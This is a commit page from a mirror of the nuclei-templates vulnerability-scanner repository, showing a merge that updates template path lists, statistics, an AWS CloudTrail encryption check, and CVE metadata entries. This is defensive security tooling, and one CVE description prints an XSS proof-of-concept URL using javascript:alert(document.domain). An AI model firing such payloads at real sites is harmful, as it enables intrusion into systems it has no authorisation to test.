daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:main' into main

patch-4
Satya Prakash 2024-05-16 16:09:07 +05:30 committed by GitHub
parent d3c7465d60 cc6d313f0b
commit f20da22ead
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
81 changed files with 7471 additions and 5691 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

104
.github/workflows/templates-sync.yml vendored
View File

@ -3,70 +3,46 @@ on:
push:
paths:
- '.new-additions'
- 'http/cves/2015/CVE-2015-4455.yaml'
- 'http/cves/2019/CVE-2019-7139.yaml'
- 'http/cves/2023/CVE-2023-1892.yaml'
- 'http/cves/2023/CVE-2023-2227.yaml'
- 'http/cves/2023/CVE-2023-27032.yaml'
- 'http/cves/2023/CVE-2023-2948.yaml'
- 'http/cves/2023/CVE-2023-2949.yaml'
- 'http/cves/2023/CVE-2023-31446.yaml'
- 'http/cves/2023/CVE-2023-32077.yaml'
- 'http/cves/2023/CVE-2023-38964.yaml'
- 'http/cves/2023/CVE-2023-43208.yaml'
- 'http/cves/2023/CVE-2023-44812.yaml'
- 'http/cves/2023/CVE-2023-4521.yaml'
- 'http/cves/2023/CVE-2023-45375.yaml'
- 'http/cves/2023/CVE-2023-46347.yaml'
- 'http/cves/2023/CVE-2023-4973.yaml'
- 'http/cves/2023/CVE-2023-5003.yaml'
- 'http/cves/2023/CVE-2023-6389.yaml'
- 'http/cves/2023/CVE-2023-6989.yaml'
- 'http/cves/2024/CVE-2024-0235.yaml'
- 'http/cves/2024/CVE-2024-0881.yaml'
- 'http/cves/2024/CVE-2024-1183.yaml'
- 'http/cves/2024/CVE-2024-22927.yaml'
- 'http/cves/2024/CVE-2024-2340.yaml'
- 'http/cves/2024/CVE-2024-23917.yaml'
- 'http/cves/2024/CVE-2024-24131.yaml'
- 'http/cves/2024/CVE-2024-27956.yaml'
- 'http/cves/2024/CVE-2024-2876.yaml'
- 'http/cves/2024/CVE-2024-3136.yaml'
- 'http/cves/2024/CVE-2024-31621.yaml'
- 'http/cves/2024/CVE-2024-31848.yaml'
- 'http/cves/2024/CVE-2024-31849.yaml'
- 'http/cves/2024/CVE-2024-31850.yaml'
- 'http/cves/2024/CVE-2024-31851.yaml'
- 'http/cves/2024/CVE-2024-32399.yaml'
- 'http/cves/2024/CVE-2024-32640.yaml'
- 'http/cves/2024/CVE-2024-32651.yaml'
- 'http/cves/2024/CVE-2024-33575.yaml'
- 'http/cves/2024/CVE-2024-33724.yaml'
- 'http/cves/2024/CVE-2024-4040.yaml'
- 'http/cves/2024/CVE-2024-4348.yaml'
- 'http/default-logins/crushftp/crushftp-anonymous-login.yaml'
- 'http/default-logins/crushftp/crushftp-default-login.yaml'
- 'http/default-logins/soplanning/soplanning-default-login.yaml'
- 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml'
- 'http/exposed-panels/bonobo-server-panel.yaml'
- 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml'
- 'http/exposed-panels/cyberchef-panel.yaml'
- 'http/exposed-panels/femtocell-panel.yaml'
- 'http/exposed-panels/monitorr-panel.yaml'
- 'http/exposed-panels/openwebui-panel.yaml'
- 'http/exposed-panels/teamforge-panel.yaml'
- 'http/exposed-panels/tixeo-panel.yaml'
- 'http/misconfiguration/installer/eyoucms-installer.yaml'
- 'http/misconfiguration/installer/sabnzbd-installer.yaml'
- 'http/misconfiguration/microsoft/ms-exchange-local-domain.yaml'
- 'http/misconfiguration/titannit-web-exposure.yaml'
- 'http/takeovers/squadcast-takeover.yaml'
- 'http/vulnerabilities/citrix/citrix-oob-memory-read.yaml'
- 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml'
- 'http/vulnerabilities/titan/titannit-web-rce.yaml'
- 'http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml'
- 'network/detection/aix-websm-detect.yaml'
- 'network/detection/bluecoat-telnet-proxy-detect.yaml'
- 'http/cnvd/2017/CNVD-2017-06001.yaml'
- 'http/cves/2023/CVE-2023-29827.yaml'
- 'http/cves/2023/CVE-2023-35158.yaml'
- 'http/cves/2023/CVE-2023-36347.yaml'
- 'http/cves/2023/CVE-2023-43374.yaml'
- 'http/cves/2023/CVE-2023-44813.yaml'
- 'http/cves/2023/CVE-2023-45855.yaml'
- 'http/cves/2023/CVE-2023-5991.yaml'
- 'http/cves/2024/CVE-2024-0200.yaml'
- 'http/cves/2024/CVE-2024-1561.yaml'
- 'http/cves/2024/CVE-2024-3097.yaml'
- 'http/default-logins/softether/softether-vpn-default-login.yaml'
- 'http/exposed-panels/ackee-panel.yaml'
- 'http/exposed-panels/craftercms-panel.yaml'
- 'http/exposed-panels/easyvista-panel.yaml'
- 'http/exposed-panels/fortinet/f5-next-central-manager.yaml'
- 'http/exposed-panels/ghost-panel.yaml'
- 'http/exposed-panels/matomo-panel.yaml'
- 'http/exposed-panels/n8n-panel.yaml'
- 'http/exposed-panels/nocodb-panel.yaml'
- 'http/exposed-panels/pocketbase-panel.yaml'
- 'http/exposed-panels/qlikview-accesspoint-panel.yaml'
- 'http/exposed-panels/tiny-rss-panel.yaml'
- 'http/exposed-panels/unleash-panel.yaml'
- 'http/honeypot/tpot-honeypot-detect.yaml'
- 'http/misconfiguration/installer/custom-xoops-installer.yaml'
- 'http/misconfiguration/installer/froxlor-installer.yaml'
- 'http/misconfiguration/installer/moosocial-installer.yaml'
- 'http/misconfiguration/installer/phpmyfaq-installer.yaml'
- 'http/misconfiguration/unigui-server-monitor-exposure.yaml'
- 'http/technologies/apache/apache-answer-detect.yaml'
- 'http/technologies/boa-web-server.yaml'
- 'http/technologies/craftercms-detect.yaml'
- 'http/technologies/imgproxy-detect.yaml'
- 'http/technologies/statamic-detect.yaml'
- 'http/technologies/tinyproxy-detect.yaml'
- 'http/technologies/uni-gui-framework.yaml'
- 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml'
- 'http/vulnerabilities/other/castel-digital-sqli.yaml'
- 'javascript/enumeration/checkpoint-firewall-enum.yaml'
workflow_dispatch:
jobs:
triggerRemoteWorkflow:

104
.new-additions
View File

@ -1,64 +1,40 @@
http/cves/2015/CVE-2015-4455.yaml
http/cves/2019/CVE-2019-7139.yaml
http/cves/2023/CVE-2023-1892.yaml
http/cves/2023/CVE-2023-2227.yaml
http/cves/2023/CVE-2023-27032.yaml
http/cves/2023/CVE-2023-2948.yaml
http/cves/2023/CVE-2023-2949.yaml
http/cves/2023/CVE-2023-31446.yaml
http/cves/2023/CVE-2023-32077.yaml
http/cves/2023/CVE-2023-38964.yaml
http/cves/2023/CVE-2023-43208.yaml
http/cves/2023/CVE-2023-44812.yaml
http/cves/2023/CVE-2023-4521.yaml
http/cves/2023/CVE-2023-45375.yaml
http/cves/2023/CVE-2023-46347.yaml
http/cves/2023/CVE-2023-4973.yaml
http/cves/2023/CVE-2023-5003.yaml
http/cves/2023/CVE-2023-6389.yaml
http/cves/2023/CVE-2023-6989.yaml
http/cves/2024/CVE-2024-0235.yaml
http/cves/2024/CVE-2024-0881.yaml
http/cves/2024/CVE-2024-1183.yaml
http/cves/2024/CVE-2024-22927.yaml
http/cves/2024/CVE-2024-2340.yaml
http/cves/2024/CVE-2024-23917.yaml
http/cves/2024/CVE-2024-24131.yaml
http/cves/2024/CVE-2024-27956.yaml
http/cves/2024/CVE-2024-2876.yaml
http/cves/2024/CVE-2024-3136.yaml
http/cves/2024/CVE-2024-31621.yaml
http/cves/2024/CVE-2024-31848.yaml
http/cves/2024/CVE-2024-31849.yaml
http/cves/2024/CVE-2024-31850.yaml
http/cves/2024/CVE-2024-31851.yaml
http/cves/2024/CVE-2024-32399.yaml
http/cves/2024/CVE-2024-32640.yaml
http/cves/2024/CVE-2024-32651.yaml
http/cves/2024/CVE-2024-33575.yaml
http/cves/2024/CVE-2024-33724.yaml
http/cves/2024/CVE-2024-4040.yaml
http/cves/2024/CVE-2024-4348.yaml
http/default-logins/crushftp/crushftp-anonymous-login.yaml
http/default-logins/crushftp/crushftp-default-login.yaml
http/default-logins/soplanning/soplanning-default-login.yaml
http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml
http/exposed-panels/bonobo-server-panel.yaml
http/exposed-panels/cassia-bluetooth-gateway-panel.yaml
http/exposed-panels/cyberchef-panel.yaml
http/exposed-panels/femtocell-panel.yaml
http/exposed-panels/monitorr-panel.yaml
http/exposed-panels/openwebui-panel.yaml
http/exposed-panels/teamforge-panel.yaml
http/exposed-panels/tixeo-panel.yaml
http/misconfiguration/installer/eyoucms-installer.yaml
http/misconfiguration/installer/sabnzbd-installer.yaml
http/misconfiguration/microsoft/ms-exchange-local-domain.yaml
http/misconfiguration/titannit-web-exposure.yaml
http/takeovers/squadcast-takeover.yaml
http/vulnerabilities/citrix/citrix-oob-memory-read.yaml
http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml
http/vulnerabilities/titan/titannit-web-rce.yaml
http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
network/detection/aix-websm-detect.yaml
network/detection/bluecoat-telnet-proxy-detect.yaml
http/cnvd/2017/CNVD-2017-06001.yaml
http/cves/2023/CVE-2023-29827.yaml
http/cves/2023/CVE-2023-35158.yaml
http/cves/2023/CVE-2023-36347.yaml
http/cves/2023/CVE-2023-43374.yaml
http/cves/2023/CVE-2023-44813.yaml
http/cves/2023/CVE-2023-45855.yaml
http/cves/2023/CVE-2023-5991.yaml
http/cves/2024/CVE-2024-0200.yaml
http/cves/2024/CVE-2024-1561.yaml
http/cves/2024/CVE-2024-3097.yaml
http/default-logins/softether/softether-vpn-default-login.yaml
http/exposed-panels/ackee-panel.yaml
http/exposed-panels/craftercms-panel.yaml
http/exposed-panels/easyvista-panel.yaml
http/exposed-panels/fortinet/f5-next-central-manager.yaml
http/exposed-panels/ghost-panel.yaml
http/exposed-panels/matomo-panel.yaml
http/exposed-panels/n8n-panel.yaml
http/exposed-panels/nocodb-panel.yaml
http/exposed-panels/pocketbase-panel.yaml
http/exposed-panels/qlikview-accesspoint-panel.yaml
http/exposed-panels/tiny-rss-panel.yaml
http/exposed-panels/unleash-panel.yaml
http/honeypot/tpot-honeypot-detect.yaml
http/misconfiguration/installer/custom-xoops-installer.yaml
http/misconfiguration/installer/froxlor-installer.yaml
http/misconfiguration/installer/moosocial-installer.yaml
http/misconfiguration/installer/phpmyfaq-installer.yaml
http/misconfiguration/unigui-server-monitor-exposure.yaml
http/technologies/apache/apache-answer-detect.yaml
http/technologies/boa-web-server.yaml
http/technologies/craftercms-detect.yaml
http/technologies/imgproxy-detect.yaml
http/technologies/statamic-detect.yaml
http/technologies/tinyproxy-detect.yaml
http/technologies/uni-gui-framework.yaml
http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml
http/vulnerabilities/other/castel-digital-sqli.yaml
javascript/enumeration/checkpoint-firewall-enum.yaml

20
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2435 | dhiyaneshdk | 1262 | http | 7355 | info | 3645 | file | 337 |
| panel | 1123 | daffainfo | 864 | file | 337 | high | 1686 | dns | 25 |
| wordpress | 962 | dwisiswant0 | 803 | workflows | 191 | medium | 1503 | | |
| exposure | 901 | pikpikcu | 353 | network | 136 | critical | 1009 | | |
| xss | 895 | pussycat0x | 349 | cloud | 98 | low | 265 | | |
| wp-plugin | 837 | ritikchaddha | 326 | code | 81 | unknown | 38 | | |
| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 |
| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 |
| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | |
| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | |
| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | |
| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | |
| osint | 804 | pdteam | 297 | javascript | 56 | | | | |
| tech | 674 | princechaddha | 260 | ssl | 29 | | | | |
| lfi | 647 | ricardomaia | 232 | dns | 22 | | | | |
| misconfig | 602 | geeknik | 230 | dast | 21 | | | | |
| tech | 674 | princechaddha | 268 | ssl | 29 | | | | |
| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | |
| misconfig | 606 | geeknik | 230 | dast | 21 | | | | |
**633 directories, 8625 files**.
**638 directories, 8694 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

10608
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

18
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2435 | dhiyaneshdk | 1262 | http | 7355 | info | 3645 | file | 337 |
| panel | 1123 | daffainfo | 864 | file | 337 | high | 1686 | dns | 25 |
| wordpress | 962 | dwisiswant0 | 803 | workflows | 191 | medium | 1503 | | |
| exposure | 901 | pikpikcu | 353 | network | 136 | critical | 1009 | | |
| xss | 895 | pussycat0x | 349 | cloud | 98 | low | 265 | | |
| wp-plugin | 837 | ritikchaddha | 326 | code | 81 | unknown | 38 | | |
| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 |
| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 |
| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | |
| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | |
| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | |
| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | |
| osint | 804 | pdteam | 297 | javascript | 56 | | | | |
| tech | 674 | princechaddha | 260 | ssl | 29 | | | | |
| lfi | 647 | ricardomaia | 232 | dns | 22 | | | | |
| misconfig | 602 | geeknik | 230 | dast | 21 | | | | |
| tech | 674 | princechaddha | 268 | ssl | 29 | | | | |
| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | |
| misconfig | 606 | geeknik | 230 | dast | 21 | | | | |

17
cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml
View File

@ -14,12 +14,13 @@ info:
tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config
variables:
region: "ap-south-1"
region: "us-east-1"
flow: |
code(1)
for(let CloudTrail of iterate(template.cloudtrailname)){
set("trail", CloudTrail)
set("region", template.trailregion)
code(2)
}
@ -29,14 +30,20 @@ code:
- sh
- bash
source: |
aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
aws cloudtrail list-trails --region $region --query 'Trails[*].[Name, HomeRegion]' --output json
extractors:
- type: json
name: cloudtrailname
internal: true
json:
- '.[]'
- '.[] | .[0]'
- type: json
name: trailregion
internal: true
json:
- '.[] | .[1]'
- engine:
- sh
@ -52,5 +59,5 @@ code:
extractors:
- type: dsl
dsl:
- '"CloudTrail trail" + trail + " is not configured to encrypt log files using SSE-KMS encryption"'
# digest: 490a004630440220615ff60f92dc1540ae499c543e657c18d430e7b6b08291befb395d465b0dfa280220748efe3b2771beb250f0c50040e94c8c0a9a37f60fcb6c88bbe9ff55b5362fa1:922c64590222798bb761d5b6d8e72950
- '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"'
# digest: 4b0a00483046022100b39586900f3cb7a7ce2582be709c7b3d1b25bceaf0f6d35887c3a3d62bfff8d80221009aa3a72ddade09b522655349a54b6cb7e6e0ebd3b36d85b30899b283e77dc90d:922c64590222798bb761d5b6d8e72950

24
cves.json
View File

@ -1973,7 +1973,6 @@
{"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"}
{"ID":"CVE-2022-48197","Info":{"Name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48197.yaml"}
{"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"}
{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/ CVE-2023-6389.yaml"}
{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"}
{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
{"ID":"CVE-2023-0159","Info":{"Name":"Extensive VC Addons for WPBakery page builder \u003c 1.9.1 - Unauthenticated RCE","Severity":"high","Description":"The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0159.yaml"}
@ -2116,6 +2115,7 @@
{"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"}
{"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"}
{"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"}
{"ID":"CVE-2023-29827","Info":{"Name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","Severity":"critical","Description":"ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29827.yaml"}
{"ID":"CVE-2023-29887","Info":{"Name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","Severity":"high","Description":"A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29887.yaml"}
{"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"critical","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"}
{"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"}
@ -2175,6 +2175,7 @@
{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"}
{"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"}
{"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web applications security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"}
{"ID":"CVE-2023-35158","Info":{"Name":"XWiki - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: \u003e /xwiki/bin/view/XWiki/Main?xpage=restore\u0026showBatch=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35158.yaml"}
{"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"}
{"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"}
{"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"}
@ -2184,6 +2185,7 @@
{"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"}
{"ID":"CVE-2023-36306","Info":{"Name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","Severity":"medium","Description":"A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36306.yaml"}
{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"}
{"ID":"CVE-2023-36347","Info":{"Name":"POS Codekop v2.0 - Broken Authentication","Severity":"high","Description":"A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36347.yaml"}
{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"}
{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"critical","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"}
{"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
@ -2262,18 +2264,22 @@
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
{"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"}
